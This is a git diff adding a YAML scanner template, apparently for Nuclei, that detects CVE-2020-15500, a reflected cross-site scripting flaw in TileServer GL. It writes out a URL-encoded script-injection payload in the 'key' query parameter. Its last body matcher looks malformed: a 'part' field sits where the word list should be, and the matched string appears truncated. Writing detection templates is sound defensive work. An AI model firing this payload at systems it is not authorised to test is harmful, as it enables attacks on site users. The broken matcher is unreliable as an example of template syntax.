diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml new file mode 100644 index 0000000000..6a0066e483 --- /dev/null +++ b/cves/2020/CVE-2020-15500.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-15500 + +info: + name: TileServer GL Reflected XSS + author: Akash.C + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + source: https://github.com/maptiler/tileserver-gl/issues/461 + tags: cve,cve2020,xss,tileserver + +requests: + - method: GET + path: + - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + part: body + - '">' \ No newline at end of file